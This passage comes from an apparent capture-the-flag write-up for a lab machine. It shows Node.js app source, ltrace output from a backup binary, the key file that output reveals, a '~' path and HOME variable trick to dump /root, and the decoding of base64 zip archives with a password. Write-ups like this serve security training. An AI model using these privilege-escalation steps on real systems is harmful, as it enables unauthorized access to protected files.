else if (!doc) {
res.status(404).send({ not_found: true });
}
else {
res.send(doc);
}
});
});
app.get('/api/session', function (req, res) {
if (req.session.user) {
res.send({
authenticated: true,
user: req.session.user
});
}
else {
res.send({
authenticated: false
});
}
});
app.post('/api/session/authenticate', function (req, res) {
var failureResult = {
error: true,
message: 'Authentication failed'
};
if (!req.body.username || !req.body.password) {
res.send(failureResult);
return;
}
db.collection('users').findOne({ username: req.body.username }, function (error, doc) {
if (error) {
res.status(500).send({
message:"Uh oh, something went wrong!",
error: true
});
return;
}
if (!doc) {
res.send(failureResult);
return;
}
var hash = crypto.createHash('sha256');
var cipherText = hash.update(req.body.password).digest('hex');
if (cipherText == doc.password) {
req.session.user = doc;
res.send({
success: true
});
}
else {
res.send({
success: false
})
}
});
});
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});
}
else {
res.send({
authenticated: false
});
}
});
app.use(function(req, res, next){
res.sendFile('app.html', { root: __dirname });
});
app.listen(3000, function () {
console.log('MyPlace app listening on port 3000!')
});
});sh
backup -q testing /root
backup -q /root
backup testing testing /root
---
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!ltrace
- We can use ltrace to display calls that are made to shared libraries
sh
ltrace backup testing testing /rootsh
strncpy(0xff8251a8, "testing", 100) = 0xff8251a8
strcpy(0xff825191, "/") = 0xff825191
strcpy(0xff82519d, "/") = 0xff82519d
strcpy(0xff825127, "/e") = 0xff825127
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x98ff410
fgets("a01a6aa5..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("a01a6aa5..."..., "\n") = 64
strcmp("testing", "a01a6aa5..."...) = 1
fgets("45fac180..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("45fac180..."..., "\n") = 64
strcmp("testing", "45fac180..."...) = 1
fgets("3de811f4..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("3de811f4..."..., "\n") = 64
strcmp("testing", "3de811f4..."...) = 1
fgets("\n", 1000, 0x98ff410) = 0xff824d3f
strcspn("\n", "\n") = 0
strcmp("testing", "") = 1
fgets(nil, 1000, 0x98ff410) = 0
strcpy(0xff823d78, "Ah-ah-ah! You didn't say the mag"...) = 0xff823d78
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!- We can navigate into /etc/myplace/keys
- It is also making a comparison of the key we entered strcmp("testing", "a01a6aa5..."...) = 1
sh
cat /etc/myplace/keys
---
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
---sh
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root # let's try with the last key
---
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==sh
echo -n "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" | base64 -d > root.zipsh
unzip root.zip
7z e root.zip # [e] Extract files from archive
password: magicwordsh
cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ- No success
sh
ltrace backup dsa testing /tmp
strncpy(0xffc10e98, "testing", 100) = 0xffc10e98
strcpy(0xffc10e81, "/") = 0xffc10e81
strcpy(0xffc10e8d, "/") = 0xffc10e8d
strcpy(0xffc10e17, "/e") = 0xffc10e17
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x8307410- There is no filtering for “~”
- We can change that variable to /root
sh
export HOME=/rootsh
backup test 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
or
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"- Another base 64
sh
echo "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" | base64 -d > root.zipsh
unzip root.zip
password: magicword
Skills Learned
- Bypassing user agent filtering
- Brute forcing JSON payloads
- Exploiting buffer overflows
- Bypassing ASLR and NX
Up next
MediumApr 2022
HTB — Valentine
Heartbleed (CVE-2014-0160) memory leak extracts a base64-encoded RSA key passphrase. Root via tmux session hijack.
Read writeup
MediumApr 2022
HTB — Poison
PHP LFI escalated to RCE via Apache log poisoning. SSH tunneling exposes an internal VNC session running as root.
Read writeup
EasyApr 2022
HTB — Sunday
Finger service enumerates valid usernames. Weak SSH credentials, troll binary, sudo wget for arbitrary file write to root.
Read writeup